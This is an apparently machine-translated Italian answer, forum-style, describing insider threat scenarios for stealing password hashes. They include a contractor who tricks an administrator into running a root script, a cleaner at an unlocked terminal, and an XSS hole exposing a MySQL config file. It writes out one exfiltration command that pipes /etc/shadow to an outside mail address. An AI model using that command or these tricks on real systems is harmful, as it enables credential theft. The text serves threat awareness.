Le persone con intenzioni malevole potrebbero andare a rubare informazioni sensibili (ad esempio password) tramite i seguenti metodi.
Esempio: l'hacker malintenzionato prende lavoro per la società attaccata come sviluppatore su un contratto di 3 mesi e riceve un account di shell su un server con privilegi limitati e chiedo all'amministratore di sistema di verificare la presenza di un problema sconosciuto che ostacola il mio lavoro. Sono riuscito a convincerlo a darmi i privilegi di root per uno script di shell scritto da me per cinque minuti, in quanto aiuta a personalizzare l'ambiente di lavoro e accelera notevolmente il mio progetto. Dato che è impegnato con altre cose e ha una riunione in dieci minuti, mi concede root
privilegi per il mio script personalizzato per 10 minuti. Ho impostato una trappola, lo script dannoso viene eseguito con i privilegi di root, che inviano il file /etc/shadow
all'account di posta elettronica della mia azienda. Alcune settimane dopo avrò concesso il mio accesso VPN, effettuerò il collegamento VPN dalla mia macchina domestica e riceverò una copia / incolla dall'email della mia azienda sul desktop di casa. Ho ottenuto gli hash delle password.
- Accesso fisico non autorizzato alle workstation
Esempio: un hacker malintenzionato si impegna come addetto alle pulizie per l'impresa di pulizie che subappalta i subappalti per l'azienda. È autorizzato ad accedere ai locali del dipartimento IT, compreso l'amministratore di sistema o il capo degli sviluppatori. Cerca password o informazioni sensibili su post-it o cerca di trovare workstation sbloccate ecc. Prima o poi ne troverà una. Immagina il terminale aperto dell'amministratore di sistema che ha lasciato accidentalmente il terminale della shell aperto dopo essere uscito di casa in fretta. Ovviamente, i privilegi di sudo
con root
di accesso sono ancora aperti dato che si era dimenticato di chiudere la sua workstation ... mentre sta pulendo la sua scrivania, spazzolando via la polvere dalla tastiera, si guarda intorno, nessuno sta guardando , l'intero ufficio è vuoto, tutti erano andati a casa per la giornata. Digita rapidamente cat /etc/shadow | mail [email protected]
e ottiene gli hash delle password.
Esempio: contro un server Web scarsamente protetto un hacker malintenzionato riesce a eseguire uno script XSS, in cui l'iniezione di codice esegue un comando che gli invia il file chiamato /root/my.cnf
che l'amministratore di sistema aveva dimenticato di rimuovere dal server web con MySQL era stato creato. Aveva pensato che la sua cartella HOME fosse comunque sicura, quindi pensava che la rimozione dei file incluse le password da HOME di root non fosse una priorità. La password MySQL sembra essere la stessa root
password su quella macchina. Con la password di root, non è un'impresa da poco per ottenere altre informazioni sensibili per le password di altri server più protetti.
I metodi di cui sopra non credo siano ingegneria sociale. Spero che questo aiuti ad allargare la tua immaginazione:)